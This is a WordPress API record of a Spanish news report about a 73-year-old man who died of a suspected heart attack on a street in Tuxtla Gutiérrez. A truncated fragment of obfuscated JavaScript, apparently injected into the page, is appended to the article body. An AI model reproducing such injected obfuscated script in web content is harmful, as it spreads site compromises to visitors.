{"id":11062,"date":"2023-07-22T01:57:03","date_gmt":"2023-07-22T01:57:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11062"},"modified":"2023-07-22T01:57:03","modified_gmt":"2023-07-22T01:57:03","slug":"por-presunto-paro-cardiaco-fallece-hombre-en-la-via-publica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11062","title":{"rendered":"Por presunto paro card\u00edaco fallece hombre en la v\u00eda p\u00fablica"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689990991591-1024x576.jpg\" alt=\"\" class=\"wp-image-11063\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689990991591-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689990991591-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689990991591-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689990991591.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 21 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un hombre de la tercera edad perdi\u00f3 la vida este viernes en la v\u00eda p\u00fablica, a causa de un presunto paro card\u00edaco.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando un hombre de la tercera edad caminaba a la altura de la 11 Oriente y la 1a Sur, y de manera repentina de detuvo y cay\u00f3 al suelo.<\/p>\n\n\n\n<p>Despu\u00e9s comenz\u00f3 a convulsionar y testigos llamaron a los n\u00fameros de emergencias.<\/p>\n\n\n\n<p>Socorristas llegaron al lugar y tras realizar una revisi\u00f3n determinaron que ya hab\u00eda muerto.<\/p>\n\n\n\n<p>Familiares arribaron e informaron que se trataba de Ricardo Zamayoa de 73 a\u00f1os de edad quien padec\u00eda de hipertensi\u00f3n.<\/p>\n\n\n\n<p>Peritos de la Fiscal\u00eda General del Estado realizaron las diligencias correspondientes y levantaron el cuerpo para trasladarlo al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 21 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un hombre de la tercera edad perdi\u00f3 la vida este viernes en la v\u00eda p\u00fablica, a causa de un presunto paro card\u00edaco. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando un hombre de la tercera edad caminaba a la altura de la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11063,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-11062","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11062","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11062"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11062\/revisions"}],"predecessor-version":[{"id":11064,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11062\/revisions\/11064"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11063"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11062"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11062"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11062"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}